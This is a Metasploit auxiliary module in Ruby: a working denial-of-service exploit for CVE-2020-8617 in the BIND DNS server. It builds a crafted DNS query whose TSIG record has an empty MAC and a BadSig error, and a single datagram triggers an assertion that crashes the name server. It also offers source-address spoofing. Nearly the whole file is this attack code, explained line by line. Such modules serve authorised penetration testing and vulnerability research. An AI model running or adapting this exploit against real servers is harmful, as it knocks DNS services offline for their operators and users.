`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
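class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  # Key name and algorithm carried in the crafted TSIG record. The referenced
  # advisory uses "local-ddns" with hmac-sha256; the key name has to be one the
  # target server knows, otherwise the TSIG validity check that contains the
  # logic error is never reached (so a miss here is a silent no-op, not an error).
  TSIG_KEY_NAME = 'local-ddns'.freeze
  TSIG_ALGORITHM = 'hmac-sha256'.freeze
  TSIG_RR_TYPE = 250    # RR type TSIG
  TSIG_RR_CLASS = 255   # class ANY, as required for TSIG records
  TSIG_ERROR_BADSIG = 16

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BIND TSIG Badtime Query Denial of Service',
        'Description' => %q{
          A logic error in code which checks TSIG validity can be used to
          trigger an assertion failure in tsig.c.
        },
        'Author' => [
          'Tobias Klein', # Research and Original PoC
          'Shuto Imai', # msf module author
        ],
        'References' => [
          ['CVE', '2020-8617'],
          ['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703'],
          ['URL', 'https://www.trapkit.de/advisories/TKADV2020-002.txt']
        ],
        'DisclosureDate' => '2020-05-19',
        'License' => MSF_LICENSE,
        # No reply is awaited: a vulnerable named aborts on the assertion and
        # never answers, so a receive window would only slow the scan down.
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
        'Notes' => {
          # One datagram takes the whole name server down (assertion -> abort);
          # run only against targets you are authorised to crash.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),
    ])
    # The Capture mixin is only used for source spoofing; its pcap-side
    # options are meaningless for this module.
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  # Sends one crafted query to +ip+ on RPORT.
  #
  # When SRC_ADDR is set the datagram goes out via scanner_spoof_send (Capture
  # mixin, which presumably needs raw-socket/pcap privileges -- verify on the
  # scanning host); otherwise a plain UDP send is used.
  def scan_host(ip)
    print_status("Sending packet to #{ip}")
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      scanner_send(payload, ip, rport)
    end
  end

  # Builds the trigger datagram: a standard A query for a random name with a
  # single TSIG record in the additional section whose MAC is empty (MAC size
  # 0) and whose error field is BadSig.
  #
  # The buffer is assembled with Array#pack so it is ASCII-8BIT regardless of
  # the source file's encoding (the original hand-written "\x00\xfa"-style
  # literals only worked because every preceding byte happened to be 7-bit),
  # and RDLENGTH is derived from the RDATA instead of being hard-coded.
  #
  # @return [String] raw DNS message, binary encoded
  def payload
    # Header: random 16-bit transaction ID, flags 0x0000 (standard query),
    # QDCOUNT 1, ANCOUNT 0, NSCOUNT 0, ARCOUNT 1 (the TSIG record).
    msg = Rex::Text.rand_text_alphanumeric(2).b
    msg << [0x0000, 1, 0, 0, 1].pack('n5')

    # Question section: <random>.<random> A IN
    msg << get_domain.b << "\x00".b # root label terminates the name
    msg << [1, 1].pack('n2')        # QTYPE A (1), QCLASS IN (1)

    # Additional section: TSIG RR owned by the key name, class ANY, TTL 0
    msg << encode_name(TSIG_KEY_NAME)
    msg << [TSIG_RR_TYPE, TSIG_RR_CLASS, 0].pack('nnN')
    rdata = tsig_rdata
    msg << [rdata.bytesize].pack('n') << rdata # RDLENGTH (29 for these constants)
    msg
  end

  # Random two-label query name (6 + 3 alphanumerics) in wire form, WITHOUT
  # the terminating root label -- +payload+ appends it.
  #
  # @return [String] length-prefixed labels, binary encoded
  def get_domain
    [6, 3].map { |len| [len, Rex::Text.rand_text_alphanumeric(len)].pack('Ca*') }.join
  end

  private

  # TSIG RDATA with every variable field zeroed:
  #   algorithm name, time signed (48-bit 0 = 1970-01-01), fudge 0,
  #   MAC size 0 (so no MAC bytes follow), original ID 0,
  #   error BadSig (16), other len 0.
  #
  # @return [String] RDATA bytes, binary encoded
  def tsig_rdata
    rdata = encode_name(TSIG_ALGORITHM)
    rdata << [0, 0].pack('nN') # time signed: 6 zero bytes
    rdata << [0, 0, 0, TSIG_ERROR_BADSIG, 0].pack('n5')
    rdata
  end

  # Encodes a dotted name (or single label) into DNS wire form:
  # length-prefixed labels followed by the empty root label.
  #
  # @param name [String] e.g. "local-ddns" or "hmac-sha256"
  # @return [String] wire-form name, binary encoded
  def encode_name(name)
    name.split('.').map { |label| [label.bytesize, label].pack('Ca*') }.join << "\x00"
  end
end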
`